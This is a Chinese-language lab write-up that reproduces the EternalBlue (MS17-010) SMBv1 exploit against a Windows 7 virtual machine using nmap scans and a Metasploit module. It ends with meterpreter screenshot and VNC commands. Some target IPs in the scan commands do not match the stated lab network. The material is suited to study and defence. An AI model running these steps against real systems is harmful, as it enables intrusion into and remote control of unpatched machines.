1.概述
永恒之蓝(EternalBlue)是一个影响Windows操作系统的远程代码执行漏洞,编号为CVE-2017-0144,最初由美国国家安全局(NSA)开发并利用,后来被黑客组织Shadow Brokers泄露。该漏洞存在于SMBv1协议的内存处理过程中,攻击者可通过发送特制的恶意数据包远程执行任意代码,控制目标系统。它最臭名昭著的应用是2017年的WannaCry勒索软件攻击,该攻击迅速传播,影响超过230,000台计算机,导致全球范围内的广泛破坏。微软在2017年3月发布了安全更新补丁(MS17-010)修复该漏洞,但由于部分系统未及时更新,仍有大量机器暴露在风险之中。为防范此类攻击,建议关闭SMBv1协议并及时应用补丁。本文在虚拟环境中,使用Nmap和Metasploit对病毒攻击进行复现,展示其攻击过程,供大家学习和参考。
如果当前的Windows系统启用了SMBv1协议并且没有安装微软发布的补丁MS17-010,那么该系统确实暴露在永恒之蓝(EternalBlue)漏洞的威胁之下。
2. 复现准备
2.1 漏洞原理
永恒之蓝的漏洞存在于SMBv1协议的实现中。当一个Windows系统通过SMBv1接收到经过特制的恶意请求时,协议处理过程中的缓冲区管理出现错误,导致内存中的数据被非法操作。这种内存管理漏洞属于缓冲区溢出(Buffer Overflow)类型,使得攻击者可以向目标系统注入并执行任意代码,最终完全控制受害者系统。其详细过程如下:
- 缓冲区溢出:攻击者向目标系统的SMBv1服务发送一个特制的请求数据包,该数据包利用了SMB协议在处理网络请求时的内存管理缺陷。在处理这些数据时,系统没有正确验证输入的大小,导致了缓冲区溢出问题。
- 内存损坏:缓冲区溢出会使得攻击者能够覆盖系统内存中的数据,尤其是代码执行区域的内存。通过精心构造的攻击数据包,攻击者能够覆盖特定的内存区域,使得系统执行恶意代码。
- 远程代码执行:攻击者可以在目标系统上植入恶意代码并远程执行。因为SMB服务通常运行在系统权限下,攻击者获得的执行权限往往是管理员权限,这意味着攻击者可以完全控制受害系统。
缓冲区溢出(Buffer Overflow)是一种常见的计算机安全漏洞,发生在程序试图将超过预定大小的数据写入缓冲区时。缓冲区是程序在内存中用于临时存储数据的区域,当数据超出该区域容量时,多余的数据会覆盖相邻的内存地址,可能导致程序崩溃或给攻击者提供执行任意代码的机会。
2.2 漏洞影响
永恒之蓝漏洞影响了多个Windows版本,其中Windows 7和Windows Server 2008受到的影响最为严重,许多未打补丁的系统成为攻击目标。Windows Vista和Windows XP也存在风险,前者在2017年结束支持,后者在2014年已不再获得安全更新,使用这些版本的系统极为脆弱。Windows Server 2012虽然受到影响,但通常会及时进行安全更新,而Windows 10在漏洞首次出现时也受影响,但迅速推出了补丁,风险相对较低。Windows Server 2016和2019虽受影响,但仍在持续支持中,建议用户定期更新以降低安全风险。
Windows版本 | 影响程度 | 支持状态 |
Windows 7 | 受影响严重,许多未打补丁的系统成为攻击目标 | 2020年1月结束支持,某些企业仍在使用 |
Windows Server 2008 | 同样受到影响,广泛应用于企业和数据中心环境 | 2020年1月结束主流支持,转入扩展支持 |
Windows Vista | 受到影响,但用户数量较少 | 2017年4月结束支持 |
Windows XP | 历史悠久的系统,易受到攻击,特别是在特定设备上 | 2014年结束支持,使用该版本的系统风险极高 |
Windows Server 2012 | 受影响,但通常会较快进行安全更新 | 仍在进行主流支持,未打补丁的系统存在风险 |
Windows 10 | 受影响但快速发布了补丁,相对风险较低 | 持续获得更新和支持,建议定期安装安全补丁 |
Windows Server 2016 | 受影响但及时获得安全补丁 | 仍在持续支持中,建议定期更新 |
Windows Server 2019 | 受影响但及时获得安全补丁 | 仍在持续支持中,建议定期更新 |
2.3 复现环境
虚拟环境搭建:VMware Workstation 17 Pro
网络模式:NAT是一种在网络设备(如路由器或防火墙)中使用的技术,用于将私有IP地址转换为公共IP地址。通过NAT,多个虚拟机可以共享宿主机的公共IP地址,以访问外部网络。
当虚拟机发送网络请求时,宿主机会捕获这些请求,并将虚拟机的私有IP地址转换为宿主机的公共IP地址,然后将请求发送到外部网络。当外部网络返回数据时,宿主机会使用NAT表将数据包路由回相应的虚拟机,每个虚拟机的流量通过不同的端口进行标识,从而确保数据包能够正确发送到目标虚拟机。
攻击机:kali Linux 2019.1,IP:192.168.153.130。
靶机:Windows 7,IP:192.168.153.129。
3. 攻击复现
3.1 使用nmap进行扫描
使用nmap扫描当前网段中存活的主机
# 活跃机器扫描
nmap -sS 192.168.153.0/24
扫描发现与攻击机处于同一网段的靶机,其 IP 为 192.168.153.129,其开放的端口包括 135 端口、139 端口基于 445 端口。在此基础上,需要进一步确认靶机的操作系统类型。
# 操作系统侦察
nmap -O 192.168.56.129
扫描发现靶机的操作系统为 Windows 7,在此基础上进一步通过nmap脚本扫描靶机中存在的漏洞。
# 漏洞扫描
nmap --script=vuln 192.168.56.132
扫描发现靶机存在永恒之蓝漏洞(ms17-010),接下来需要使用工具实现漏洞的利用。
3.2 使用Metasploit进行攻击
启动 Metasploit,并搜索永恒之蓝漏洞相关的工具。
# 启动metasploit
msfconsole
# 搜索永恒之蓝相关工具
search ms17-010
执行上述指令后发现,存在一系列用于永恒之蓝漏洞利用的模块,如上图所示。其中,我们利用模块2。
# 选择模块2
use 2
# 显示配置
show option
# 设置靶机IP
set RHOSTS 192.168.153.129
# 运行模块
run
运行成功后会出现 `meterpreter >` 提示符,它是 Metasploit 的一个强大扩展模块。通过 Meterpreter,可以执行更深入的渗透操作,例如获取目标系统的屏幕截图、上传或下载文件、创建持久后门等。基于meterpreter模块,我们首先可以实现靶机的截屏,如下图所示。
# 靶机截屏指令
screenshot
# 远程桌面指令
run vnc